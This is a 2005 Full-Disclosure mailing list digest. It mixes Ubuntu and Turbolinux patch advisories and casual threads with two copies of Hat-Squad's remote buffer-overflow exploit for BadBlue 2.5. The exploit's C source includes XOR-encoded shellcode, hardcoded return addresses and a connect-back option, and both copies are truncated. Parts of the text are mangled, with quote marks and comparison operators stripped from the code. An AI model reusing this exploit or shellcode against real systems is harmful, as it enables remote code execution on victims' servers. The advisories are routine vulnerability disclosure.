Re: [Full-Disclosure] client - server
Most likely they might have blocked the entire pool of IP belonging to your ISP try to visit the website with a proxy server On Sun, 27 Feb 2005 21:29:18 -0500, Eric Windisch [EMAIL PROTECTED] wrote: On Mon, 2005-02-28 at 02:43 +0100, Matteo Giannone wrote: - a simple ip check doesn't work with dynamic addresses... It will work for as long as your IP is valid. They can also ban the entire IP block (aka, your ISP) - computer name can be changed - mac address can be changed (even I wasn't able to, because I have a usb dsl modem and I cannot change its MAC working with regedit or using tools like smac ) Your browser will not (or should not, anyway) reveal your computer name or mac address. Anything else ? User-agents and referers. Some browsers can send quite a bit of information in the user-agent string. It could also be a content filter between you and the web site in question. Schools and parents setup these to censor the surfing of children. Many companies filter their content too, due to the distraction (and legal ramifications) brought about by warez and pornography. How the hell do they recognize me ? By the tin-foil hat ;) -- Eric Windisch [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- Gautam R. Singh http://www.google.com/search?q=gautam.singh%40gmail.com [mcp,ccna,cspfa,] t: +91 9885576081 | pgp: http://gautam.techwhack.com/key/ | ymsgr: er-333 | msn: [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [HAT-SQUAD] BadBlue, Easy P2P File Sharing Remote Exploit (update)
(reposting again with the hole history) Andres Tarasco of sia.es has published yesterday a security hole affecting BadBlue 2.5 and below. http://seclists.org/lists/fulldisclosure/2005/Feb/0704.html Hat-Squad.com brought you a fresh exploit. The exploit and BadBlue v2.5 are both available at class101.org for your exploitation's pratices, njoy :) /* BadBlue, Easy File Sharing Remote BOverflow Homepage: badblue.com Affected version: v2.5 (2.60 and below not tested) Patched version: v2.61 Link: badblue.com/bbs98.exe Date: 27 February 2005 Application Risk: Severely High Internet Risk:Low Dicovery Credits: Andres Tarasco (atarasco _at_ sia.es) Exploit Credits : class101 metasploit.com Hole History: 26-2-2005: BOF flaw published by Andres Tarasco of sia.es 27-2-2002: Hat-Squad.com releases an exploit 28-2-2005: haxorcitos releases a dupe with fake date : or you sux doing private stuffs. Notes: -6 bad chars, 0x00, 0x26, 0x20, 0x0A, 0x8C, 0x3C, badly interpreted by BadBlue -using offsets from ext.dll, universal. -use findjmp2 to quick search into ext.dll to see if the offsets changes in the others BadBlue's versions below 2.5 -if you need the v2.5 for exploitation's pratices, get it on class101.org -rename to .c for nux, haven't tested this one but it should works fine. Greet: Nima Majidi Behrang Fouladi Pejman Hat-Squad.com metasploit.com A^C^E of addict3d.org str0ke of milw0rm.com and my homy class101.org : */ #include stdio.h #include string.h #include time.h #ifdef WIN32 #include winsock2.h #pragma comment(lib, ws2_32) #else #include sys/socket.h #include sys/types.h #include netinet/in.h #include netinet/in_systm.h #include netinet/ip.h #include netdb.h #include arpa/inet.h #include unistd.h #include stdlib.h #include fcntl.h #endif char scode[]= /*XORed, I kiss metasploit.com because they are what means elite!*/ \x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x03 \x7b\x5b\x13\x83\xee\xfc\xe2\xf4\xff\x11\xb0\x5c\xeb\x82\xa4\xec \xfc\x1b\xd0\x7f\x27\x5f\xd0\x56\x3f\xf0\x27\x16\x7b\x7a\xb4\x98 \x4c\x63\xd0\x4c\x23\x7a\xb0\xf0\x33\x32\xd0\x27\x88\x7a\xb5\x22 \xc3\xe2\xf7\x97\xc3\x0f\x5c\xd2\xc9\x76\x5a\xd1\xe8\x8f\x60\x47 \x27\x53\x2e\xf0\x88\x24\x7f\x12\xe8\x1d\xd0\x1f\x48\xf0\x04\x0f \x02\x90\x58\x3f\x88\xf2\x37\x37\x1f\x1a\x98\x22\xc3\x1f\xd0\x53 \x33\xf0\x1b\x1f\x88\x0b\x47\xbe\x88\x3b\x53\x4d\x6b\xf5\x15\x1d \xef\x2b\xa4\xc5\x32\xa0\x3d\x40\x65\x13\x68\x21\x6b\x0c\x28\x21 \x5c\x2f\xa4\xc3\x6b\xb0\xb6\xef\x38\x2b\xa4\xc5\x5c\xf2\xbe\x75 \x82\x96\x53\x11\x56\x11\x59\xec\xd3\x13\x82\x1a\xf6\xd6\x0c\xec \xd5\x28\x08\x40\x50\x28\x18\x40\x40\x28\xa4\xc3\x65\x13\x5b\x76 \x65\x28\xd2\xf2\x96\x13\xff\x09\x73\xbc\x0c\xec\xd5\x11\x4b\x42 \x56\x84\x8b\x7b\xa7\xd6\x75\xfa\x54\x84\x8d\x40\x56\x84\x8b\x7b \xe6\x32\xdd\x5a\x54\x84\x8d\x43\x57\x2f\x0e\xec\xd3\xe8\x33\xf4 \x7a\xbd\x22\x44\xfc\xad\x0e\xec\xd3\x1d\x31\x77\x65\x13\x38\x7e \x8a\x9e\x31\x43\x5a\x52\x97\x9a\xe4\x11\x1f\x9a\xe1\x4a\x9b\xe0 \xa9\x85\x19\x3e\xfd\x39\x77\x80\x8e\x01\x63\xb8\xa8\xd0\x33\x61 \xfd\xc8\x4d\xec\x76\x3f\xa4\xc5\x58\x2c\x09\x42\x52\x2a\x31\x12 \x52\x2a\x0e\x42\xfc\xab\x33\xbe\xda\x7e\x95\x40\xfc\xad\x31\xec \xfc\x4c\xa4\xc3\x88\x2c\xa7\x90\xc7\x1f\xa4\xc5\x51\x84\x8b\x7b \xf3\xf1\x5f\x4c\x50\x84\x8d\xec\xd3\x7b\x5b\x13; char payload[1024]; char ebx[]=\x05\x53\x02\x10; /*call.ext.dll*/ char ebx2[]=\xB0\x55\x02\x10; /*pop.pop.ret.ext.dll thx findjmp2 ;*/ char pad[]=\xEB\x0C\x90\x90; char pad2[]=\xE9\x05\xFE\xFF\xFF; char EOL[]=\x0D\x0A\x0D\x0A; char talk[]= \x47\x45\x54\x20\x2F\x65\x78\x74\x2E\x64\x6C\x6C\x3F\x6D\x66\x63 \x69\x73\x61\x70\x69\x63\x6F\x6D\x6D\x61\x6E\x64\x3D; #ifdef WIN32 WSADATA wsadata; #endif void ver(); void usage(char* us); int main(int argc,char *argv[]) { ver(); unsigned long gip; unsigned short gport; char *target, *os; if (argc6||argc3||atoi(argv[1])3||atoi(argv[1])1){usage(argv[0]);return -1; } if (argc==5){usage(argv[0]);return -1;} if (strlen(argv[2])7){usage(argv[0]);return -1;} if (argc==6) { if (strlen(argv[4])7){usage(argv[0]);return -1;} } #ifndef WIN32 if (argc==6) { gip=inet_addr(argv[4])^(long)0x93939393; gport=htons(atoi(argv[5]))^(short)0x9393; } #define Sleep sleep #define SOCKET int #define closesocket(s) close(s) #else if (WSAStartup(MAKEWORD(2,0),wsadata)!=0){printf([+] wsastartup error\n);return -1;} if (argc==6) { gip=inet_addr(argv[4])^(ULONG)0x93939393; gport=htons(atoi(argv[5]))^(USHORT)0x9393; } #endif int ip=htonl(inet_addr(argv[2])), port; if (argc==4||argc==6){port=atoi(argv[3]);} else port=80; SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server; s=socket(AF_INET,SOCK_STREAM,0); if (s==-1){printf([+] socket() error\n);return -1;} if (atoi(argv[1]) == 1){target=ebx;os=Win2k SP4 Server English\n[+] Win2k SP4 Pro. English\n[+]Win2k SP- - -;} if (atoi(argv[1]) == 2){target=ebx2;os=WinXP
[Full-Disclosure] [USN-86-1] cURL vulnerability
=== Ubuntu Security Notice USN-86-1 February 28, 2005 curl vulnerability CAN-2005-0940 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) The following packages are affected: libcurl2 libcurl2-gssapi The problem can be corrected by upgrading the affected package to version 7.12.0.is.7.11.2-1ubuntu0.1. In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: infamous41md discovered a buffer overflow in cURL's NT LAN Manager (NTLM) authentication handling. By sending a specially crafted long NTLM reply packet, a remote attacker could overflow the reply buffer. This could lead to execution of arbitrary attacker specified code with the privileges of the application using the cURL library. Source archives: http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.12.0.is.7.11.2-1ubuntu0.1.diff.gz Size/MD5: 160391 4f1c042b0f375a8d06e0403e5baa3b7e http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.12.0.is.7.11.2-1ubuntu0.1.dsc Size/MD5: 707 5ec7fa4228218f3186ad7f41ef1b56eb http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.12.0.is.7.11.2.orig.tar.gz Size/MD5: 1435629 25e6617ea7dec34d072426942b77801f amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.12.0.is.7.11.2-1ubuntu0.1_amd64.deb Size/MD5: 108602 17f9e77e1a091f5e22024396ab19be5f http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl2-dbg_7.12.0.is.7.11.2-1ubuntu0.1_amd64.deb Size/MD5: 1043660 1163357a2e57d670326df84ccbe01108 http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl2-dev_7.12.0.is.7.11.2-1ubuntu0.1_amd64.deb Size/MD5: 568022 b91d5f9a6b39b84962840f8f0a552f91 http://security.ubuntu.com/ubuntu/pool/universe/c/curl/libcurl2-gssapi_7.12.0.is.7.11.2-1ubuntu0.1_amd64.deb Size/MD5: 111892 283edaf68d6a725710ed966a09729fb1 http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl2_7.12.0.is.7.11.2-1ubuntu0.1_amd64.deb Size/MD5: 224598 d5549b89c19484e8b4488a46e4b5b727 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.12.0.is.7.11.2-1ubuntu0.1_i386.deb Size/MD5: 107762 dbb0f3404f4955d89e39134c309ba68d http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl2-dbg_7.12.0.is.7.11.2-1ubuntu0.1_i386.deb Size/MD5: 1028978 6fb4edd748b6b2e92db5cc935fb063cb http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl2-dev_7.12.0.is.7.11.2-1ubuntu0.1_i386.deb Size/MD5: 556594 31b0848d7a44250a2f3536ead3462a0f http://security.ubuntu.com/ubuntu/pool/universe/c/curl/libcurl2-gssapi_7.12.0.is.7.11.2-1ubuntu0.1_i386.deb Size/MD5: 109912 0b5b91da5ca5fc37b1d1e5f04c51962e http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl2_7.12.0.is.7.11.2-1ubuntu0.1_i386.deb Size/MD5: 222848 77aa777db65b32788cea78fdd1d9ef4d powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.12.0.is.7.11.2-1ubuntu0.1_powerpc.deb Size/MD5: 110090 ae4f871f3f6126b1ecf787affe26640c http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl2-dbg_7.12.0.is.7.11.2-1ubuntu0.1_powerpc.deb Size/MD5: 1052794 4bf356eeaaf1f6af0723cc0c63a4ed57 http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl2-dev_7.12.0.is.7.11.2-1ubuntu0.1_powerpc.deb Size/MD5: 573412 501500cf49764c55476e339e9347cd9a http://security.ubuntu.com/ubuntu/pool/universe/c/curl/libcurl2-gssapi_7.12.0.is.7.11.2-1ubuntu0.1_powerpc.deb Size/MD5: 116296 9f6d567b715c1ee08afecc02c8909783 http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl2_7.12.0.is.7.11.2-1ubuntu0.1_powerpc.deb Size/MD5: 229450 1c45a89cb1c4852d1260aa21bcc1f6c0 signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [USN-87-1] Cyrus IMAP server vulnerability
=== Ubuntu Security Notice USN-87-1 February 28, 2005 cyrus21-imapd vulnerability CAN-2005-0546 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) The following packages are affected: cyrus21-imapd The problem can be corrected by upgrading the affected package to version 2.1.16-6ubuntu0.3. In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Sean Larsson discovered a buffer overflow in the IMAP annotate extension. This possibly allowed an authenticated IMAP client to execute arbitrary code with the privileges of the Cyrus IMAP server. Source archives: http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-imapd_2.1.16-6ubuntu0.3.diff.gz Size/MD5: 236064 389812cf102f362acbdd8427d42a3fcc http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-imapd_2.1.16-6ubuntu0.3.dsc Size/MD5: 1040 7b56583400526281be8452c3c9ce24df http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-imapd_2.1.16.orig.tar.gz Size/MD5: 1687454 8f4ff803a910d0f4e4cfab3b13a6080d Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-admin_2.1.16-6ubuntu0.3_all.deb Size/MD5:87974 ea896023fb72b192e5b84d97e1c9f612 http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-doc_2.1.16-6ubuntu0.3_all.deb Size/MD5: 206610 6c655f7135379dc53f7a12f648717af3 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-clients_2.1.16-6ubuntu0.3_amd64.deb Size/MD5: 107060 35173577eee7aa4e58d081ae17423949 http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-common_2.1.16-6ubuntu0.3_amd64.deb Size/MD5: 2071564 a6704031b0a84ab7f7561a2133f91cb4 http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-dev_2.1.16-6ubuntu0.3_amd64.deb Size/MD5: 267960 c406a6936d0442da7ac366601a5bd396 http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-imapd_2.1.16-6ubuntu0.3_amd64.deb Size/MD5: 591192 182d1004c78315bf4487021723151a28 http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-murder_2.1.16-6ubuntu0.3_amd64.deb Size/MD5: 526746 3c68af3b07ec57a0ae52b87064c8df63 http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-pop3d_2.1.16-6ubuntu0.3_amd64.deb Size/MD5:93078 970dc32aeb86f6cdf9f0d385269122ae http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/libcyrus-imap-perl21_2.1.16-6ubuntu0.3_amd64.deb Size/MD5: 137768 2642bf39e391884bcde4712eb9191b94 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-clients_2.1.16-6ubuntu0.3_i386.deb Size/MD5: 104238 c9a63b935d093726a3f2a816c3982d1f http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-common_2.1.16-6ubuntu0.3_i386.deb Size/MD5: 1949418 6fcee0507a1bfa3291fbf617da7ac626 http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-dev_2.1.16-6ubuntu0.3_i386.deb Size/MD5: 261406 70d28587adaf211ccaa36dbb7ab2 http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-imapd_2.1.16-6ubuntu0.3_i386.deb Size/MD5: 561746 aec4f8aebecd6ce20f84456926a2dbe6 http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-murder_2.1.16-6ubuntu0.3_i386.deb Size/MD5: 493322 35ad3b8ad6f3a8d010187758a72aab54 http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-pop3d_2.1.16-6ubuntu0.3_i386.deb Size/MD5:85204 8bb2c9dc9ab196ccd42a67ee5049ae60 http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/libcyrus-imap-perl21_2.1.16-6ubuntu0.3_i386.deb Size/MD5: 133844 15277d0438a3966ff1f091cc2f89f6f2 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-clients_2.1.16-6ubuntu0.3_powerpc.deb Size/MD5: 106852 d464f8d95c19f2b6e2ab799756ce7253 http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-common_2.1.16-6ubuntu0.3_powerpc.deb Size/MD5: 2083580 9605c7608e077530ceb7ad39e3aa6e1b http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-dev_2.1.16-6ubuntu0.3_powerpc.deb Size/MD5: 265422 0b3be1bfb756b3f6a81ce253c5564ffa http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-imapd_2.1.16-6ubuntu0.3_powerpc.deb Size/MD5: 593502 82b7ea2f28f9aec84334a13c9fdfd742 http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-murder_2.1.16-6ubuntu0.3_powerpc.deb Size/MD5: 527656 cf5477019633341b42047261b18f01f2
[Full-Disclosure] [USN-88-1] reportbug information disclosure
=== Ubuntu Security Notice USN-88-1 February 28, 2005 reportbug information disclosure https://bugzilla.ubuntulinux.org/6600 https://bugzilla.ubuntulinux.org/6717 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) The following packages are affected: reportbug The problem can be corrected by upgrading the affected package to version 2.62ubuntu1.1. In general, a standard system upgrade is sufficient to effect the necessary changes. However, if your users already have ~/.reportbugrc files with SMTP passwords, you need to manually change their permissions with chmod 600 .reportbugrc Details follow: Rolf Leggewie discovered two information disclosure bugs in reportbug. The per-user configuration file ~/.reportbugrc was created world-readable. If it contained email smarthost passwords, these were readable by any other user on the computer storing the home directory. reportbug usually includes the settings from ~/.reportbugrc in generated bug reports. This included the smtppasswd setting (the password for an SMTP email smarthost) as well. The password is now hidden from reports. Source archives: http://security.ubuntu.com/ubuntu/pool/main/r/reportbug/reportbug_2.62ubuntu1.1.dsc Size/MD5: 540 19dab43ca7c942311e87ad5e48e32a39 http://security.ubuntu.com/ubuntu/pool/main/r/reportbug/reportbug_2.62ubuntu1.1.tar.gz Size/MD5: 115256 9b3fbec6a6974274068afb08835f0fdc Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/r/reportbug/reportbug_2.62ubuntu1.1_all.deb Size/MD5: 104630 f051c98020dffd1e8ae3253ab72e88ce signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [TURBOLINUX SECURITY INFO] 28/Feb/2005
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 This is an announcement only email list for the x86 architecture. Turbolinux Security Announcement 28/Feb/2005 The following page contains the security information of Turbolinux Inc. - Turbolinux Security Center http://www.turbolinux.com/security/ (1) kernel - Multiple vulnerabilities exist in the Linux kernel === * kernel - Multiple vulnerabilities exist in the Linux kernel === More information: The kernel package contains the Linux kernel -- the core of the Linux operating system. Impact: Please refer to the References section. Affected Products: - Turbolinux Appliance Server 1.0 Hosting Edition - Turbolinux Appliance Server 1.0 Workgroup Edition - Turbolinux 10 Server - Turbolinux Home - Turbolinux 10 F... - Turbolinux 10 Desktop - Turbolinux 8 Server - Turbolinux 8 Workstation - Turbolinux 7 Server - Turbolinux 7 Workstation Solution: Please use the turbopkg (zabom) tool to apply the update. - [Turbolinux 10 Server, Turbolinux 10 Desktop, Turbolinux 10 F..., Turbolinux Home] # turbopkg or # zabom -u kernel kernel-extramodules kernel-headers kernel-numa \ kernel-pcmcia-cs kernel-smp kernel-smp64G kernel-source [other] # turbopkg or # zabom update kernel kernel-BOOT kernel-doc kernel-headers \ kernel-pcmcia-cs kernel-smp kernel-smp64G kernel-source - Turbolinux Appliance Server 1.0 Hosting Edition Source Packages Size: MD5 kernel-2.4.25-11.src.rpm 37282641 061e6ff1934c06795f7e4e68d3fcc4bf Binary Packages Size: MD5 kernel-2.4.25-11.i586.rpm 13870636 0684f45c3ec096b3081bdc1e1b6f64f6 kernel-BOOT-2.4.25-11.i586.rpm 6946804 30a823dfdfb06d316ecd5539200a51ef kernel-doc-2.4.25-11.i586.rpm 1574609 9535386626edec172ac2897183345c6e kernel-headers-2.4.25-11.i586.rpm 2001727 5560df69f68309e7320467da0e9e077f kernel-pcmcia-cs-2.4.25-11.i586.rpm 367496 8be1b186cec318b0e0c3cff459124a97 kernel-smp-2.4.25-11.i586.rpm 14289451 e925decf7f0008149f2b19e479bc7380 kernel-smp64G-2.4.25-11.i586.rpm 14251578 5b1696ed8ed296204cc5bcaad145a9db kernel-source-2.4.25-11.i586.rpm 27612251 f316c537a3e89afe21a9b2df4204a122 Turbolinux Appliance Server 1.0 Workgroup Edition Source Packages Size: MD5 kernel-2.4.25-11.src.rpm 37282641 061e6ff1934c06795f7e4e68d3fcc4bf Binary Packages Size: MD5 kernel-2.4.25-11.i586.rpm 13870636 0684f45c3ec096b3081bdc1e1b6f64f6 kernel-BOOT-2.4.25-11.i586.rpm 6946804 30a823dfdfb06d316ecd5539200a51ef kernel-doc-2.4.25-11.i586.rpm 1574609 9535386626edec172ac2897183345c6e kernel-headers-2.4.25-11.i586.rpm 2001727 5560df69f68309e7320467da0e9e077f kernel-pcmcia-cs-2.4.25-11.i586.rpm 367496 8be1b186cec318b0e0c3cff459124a97 kernel-smp-2.4.25-11.i586.rpm 14289451 e925decf7f0008149f2b19e479bc7380 kernel-smp64G-2.4.25-11.i586.rpm 14251578 5b1696ed8ed296204cc5bcaad145a9db kernel-source-2.4.25-11.i586.rpm 27612251 f316c537a3e89afe21a9b2df4204a122 Turbolinux 10 Server Source Packages Size: MD5 ftp://ftp.turbolinux.co.jp/pub/TurboLinux/TurboLinux/ia32/Server/10/updates/SRPMS/kernel-2.6.8-4.src.rpm 55425385 d94e748d0516a9520848f2c01b8aea7b Binary Packages Size: MD5 ftp://ftp.turbolinux.co.jp/pub/TurboLinux/TurboLinux/ia32/Server/10/updates/RPMS/kernel-2.6.8-4.i586.rpm 16551194 6736c1100ad77992d4949e85af617b10 ftp://ftp.turbolinux.co.jp/pub/TurboLinux/TurboLinux/ia32/Server/10/updates/RPMS/kernel-doc-2.6.8-4.i586.rpm 1785569 e3270b94cf48cd421e9258b9bd9d203f ftp://ftp.turbolinux.co.jp/pub/TurboLinux/TurboLinux/ia32/Server/10/updates/RPMS/kernel-extramodules-2.6.8-4.i586.rpm 8031570 7c3cd07af119f8cc693fa591ec922108 ftp://ftp.turbolinux.co.jp/pub/TurboLinux/TurboLinux/ia32/Server/10/updates/RPMS/kernel-headers-2.6.8-4.i586.rpm 1898127 3045e9e5e7d1f99fd7f0a991a3b0dc08 ftp://ftp.turbolinux.co.jp/pub/TurboLinux/TurboLinux/ia32/Server/10/updates/RPMS/kernel-numa-2.6.8-4.i586.rpm 16327980 0a66ece57899a80a61c53a1fb716f4dd ftp://ftp.turbolinux.co.jp/pub/TurboLinux/TurboLinux/ia32/Server/10/updates/RPMS/kernel-pcmcia-cs-2.6.8-4.i586.rpm 336191 5a8dd1335ab98b96d98893f9f417b8f7 ftp://ftp.turbolinux.co.jp/pub/TurboLinux/TurboLinux/ia32/Server/10/updates/RPMS/kernel-smp-2.6.8-4.i586.rpm 16297749 2a71f9d9da17e3230018373bfd90df7a ftp://ftp.turbolinux.co.jp/pub/TurboLinux/TurboLinux/ia32/Server/10/updates/RPMS/kernel-smp64G-2.6.8-4.i586.rpm 16307312 d1822cc38bbb7477956078001014b8d4
Re: [Full-Disclosure] [HAT-SQUAD] BadBlue, Easy P2P File Sharing Remote Exploit (update)
Title: RE: [Full-Disclosure] [HAT-SQUAD] BadBlue, Easy P2P File Sharing Remote Exploit (update) next time then publish both in same time because coded or not because of timeline , the exploit has been brought in first by hat-squad, sorry ; -class101Jr. ResearcherHat-Squad.com- - Original Message - From: Andres Tarasco To: '[EMAIL PROTECTED]' Cc: 'full-disclosure@lists.netsys.com, [EMAIL PROTECTED]' Sent: Monday, February 28, 2005 11:18 AM Subject: RE: [Full-Disclosure] [HAT-SQUAD] BadBlue, Easy P2P File Sharing Remote Exploit (update) Hole History: 26-2-2005: BOF flaw published by Andres Tarasco of sia.es 27-2-2002: Hat-Squad.com releases an exploit 28-2-2005: haxorcitos releases a dupe with fake date : or you sux doing private stuffs. Thats simply not true. Miguel Tarasco developed the first functional exploit for this vulnerability. This exploit was not published before because of disclosure Timeline. regards On Mon, 28 Feb 2005 09:42:11 +0100, class 101 [EMAIL PROTECTED] wrote: (reposting again with the hole history) Andres Tarasco of sia.es has published yesterday a security hole affecting BadBlue 2.5 and below. http://seclists.org/lists/fulldisclosure/2005/Feb/0704.html Hat-Squad.com brought you a fresh exploit. The exploit and BadBlue v2.5 are both available at class101.org for your exploitation's pratices, njoy :) /* BadBlue, Easy File Sharing Remote BOverflow Homepage: badblue.com Affected version: v2.5 (2.60 and below not tested) Patched version: v2.61 Link: badblue.com/bbs98.exe Date: 27 February 2005 Application Risk: Severely High Internet Risk: Low Dicovery Credits: Andres Tarasco (atarasco _at_ sia.es) Exploit Credits : class101 metasploit.com Hole History: 26-2-2005: BOF flaw published by Andres Tarasco of sia.es 27-2-2002: Hat-Squad.com releases an exploit 28-2-2005: haxorcitos releases a dupe with fake date : or you sux doing private stuffs. Notes: -6 bad chars, 0x00, 0x26, 0x20, 0x0A, 0x8C, 0x3C, badly interpreted by BadBlue -using offsets from ext.dll, universal. -use findjmp2 to quick search into ext.dll to see if the offsets changes in the others BadBlue's versions below 2.5 -if you need the v2.5 for exploitation's pratices, get it on class101.org -rename to .c for nux, haven't tested this one but it should works fine. Greet: Nima Majidi Behrang Fouladi Pejman Hat-Squad.com metasploit.com A^C^E of addict3d.org str0ke of milw0rm.com and my homy class101.org : */ #include stdio.h #include string.h #include time.h #ifdef WIN32 #include "winsock2.h" #pragma comment(lib, "ws2_32") #else #include sys/socket.h #include sys/types.h #include netinet/in.h #include netinet/in_systm.h #include netinet/ip.h #include netdb.h #include arpa/inet.h #include unistd.h #include stdlib.h #include fcntl.h #endif char scode[]= /*XORed, I kiss metasploit.com because they are what means elite!*/ "\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x03" "\x7b\x5b\x13\x83\xee\xfc\xe2\xf4\xff\x11\xb0\x5c\xeb\x82\xa4\xec" "\xfc\x1b\xd0\x7f\x27\x5f\xd0\x56\x3f\xf0\x27\x16\x7b\x7a\xb4\x98" "\x4c\x63\xd0\x4c\x23\x7a\xb0\xf0\x33\x32\xd0\x27\x88\x7a\xb5\x22" "\xc3\xe2\xf7\x97\xc3\x0f\x5c\xd2\xc9\x76\x5a\xd1\xe8\x8f\x60\x47" "\x27\x53\x2e\xf0\x88\x24\x7f\x12\xe8\x1d\xd0\x1f\x48\xf0\x04\x0f" "\x02\x90\x58\x3f\x88\xf2\x37\x37\x1f\x1a\x98\x22\xc3\x1f\xd0\x53" "\x33\xf0\x1b\x1f\x88\x0b\x47\xbe\x88\x3b\x53\x4d\x6b\xf5\x15\x1d" "\xef\x2b\xa4\xc5\x32\xa0\x3d\x40\x65\x13\x68\x21\x6b\x0c\x28\x21" "\x5c\x2f\xa4\xc3\x6b\xb0\xb6\xef\x38\x2b\xa4\xc5\x5c\xf2\xbe\x75" "\x82\x96\x53\x11\x56\x11\x59\xec\xd3\x13\x82\x1a\xf6\xd6\x0c\xec" "\xd5\x28\x08\x40\x50\x28\x18\x40\x40\x28\xa4\xc3\x65\x13\x5b\x76" "\x65\x28\xd2\xf2\x96\x13\xff\x09\x73\xbc\x0c\xec\xd5\x11\x4b\x42" "\x56\x84\x8b\x7b\xa7\xd6\x75\xfa\x54\x84\x8d\x40\x56\x84\x8b\x7b" "\xe6\x32\xdd\x5a\x54\x84\x8d\x43\x57\x2f\x0e\xec\xd3\xe8\x33\xf4" "\x7a\xbd\x22\x44\xfc\xad\x0e\xec\xd3\x1d\x31\x77\x65\x13\x38\x7e" "\x8a\x9e\x31\x43\x5a\x52\x97\x9a\xe4\x11\x1f\x9a\xe1\x4a\x9b\xe0" "\xa9\x85\x19\x3e\xfd\x39\x77\x80\x8e\x01\x63\xb8\xa8\xd0\x33\x61" "\xfd\xc8\x4d\xec\x76\x3f\xa4\xc5\x58\x2c\x09\x42\x52\x2a\x31\x12" "\x52\x2a\x0e\x42\xfc\xab\x33\xbe\xda\x7e\x95\x40\xfc\xad\x31\xec" "\xfc\x4c\xa4\xc3\x88\x2c\xa7\x90\xc7\x1f\xa4\xc5\x51\x84\x8b\x7b" "\xf3\xf1\x5f\x4c\x50\x84\x8d\xec\xd3\x7b\x5b\x13"; char payload[1024]; char ebx[]="\x05\x53\x02\x10"; /*call.ext.dll*/ char
Re: Fw: [Full-Disclosure] Google Search and Gmail Correlation(ev gpsc verify reciept please)
Is anyone a part of Orkut or know someone who is? On Saturday, February 26, 2005, at 03:17PM, Ankush Kapoor [EMAIL PROTECTED] wrote: Combine Google's search capabilities with Orkut, and suddenly they know so much about so many people and how they are related. Connect keyhole to that which they recently bought, and voila it could be putting spy agencies to shame after a while! regards Ankush Kapoor On Sat, 26 Feb 2005 10:40:32 -0800, Steve Kudlak [EMAIL PROTECTED] wrote: One sort of prediction does not say too much, but google has a lot of power becuase they have a lot of information.. Interesting it was very interesting to look at, although a lot of it was the power the traditional media because I could have and did ignore most of the Swifties after initial look through of their tactics which were traditional media stuff, but most people hold that someone how is real fact and truth. Interestying question is how did you take the freeform aprocach of the zzeitgeist list and get from that to an actual bwho was going to win the election? Have Fun, Sends Steve P.S. My friends in Ohio said it was very difficult to avoid the Swifties stuff if you looked at any public media. The interesting thing was the whole way I heard very little out here on the4 West Coasst 